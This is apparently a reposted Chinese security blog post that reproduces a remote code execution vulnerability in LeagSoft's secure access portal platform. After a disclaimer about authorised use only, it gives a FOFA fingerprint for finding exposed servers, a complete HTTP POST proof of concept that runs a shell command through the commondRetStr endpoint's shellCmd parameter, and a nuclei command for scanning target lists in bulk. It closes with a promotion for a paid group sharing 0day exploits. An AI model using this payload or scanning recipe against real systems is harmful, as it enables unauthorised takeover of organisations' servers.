漏洞复现 联软科技安全准入门户平台 远程代码执行漏洞
2023-6-1 09:28:23 Author: 阿乐你好(查看原文) 阅读量:229 收藏

0x01 阅读须知

融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

0x02 漏洞描述

全球最早的网络准入控制厂商之一,联软科技再获亿级的融资,得到资本的高度认可。联软科技安全准入门户平台 commondRetStr存在远程代码执行漏洞攻击者可以获取服务器权限。

0x03 漏洞复现

fofa"UniSSOView"

1.抓取页面的报文,并使用POC进行id命令执行,得到回显

POST /TunnelGateway/commondRetStr HTTP/1.1Host: {{Hostname}}Cookie: sdp_jsessionid=AA249E70ED8C27AEBF5623728AEA3F41User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 11Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close
shellCmd=id

2.nuclei验证脚本已发表于知识星球

nuclei.exe -t lianruananjie-commondRetStr-rce.yaml -l subs.txt -stats

网络安全神兵利器分享
网络安全漏洞N/0day分享
    加入星球请扫描下方二维码,更多精,敬请期待!
👇👇👇


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247489399&idx=2&sn=e2002942a43e4dbb4af0c0ee34924acc&chksm=979a383fa0edb1295ccb33452b8413d9873d0c2882e7f023fdb94b84d1ca7ac4edb08680d4dc#rd
如有侵权请联系:admin#unsafe.sh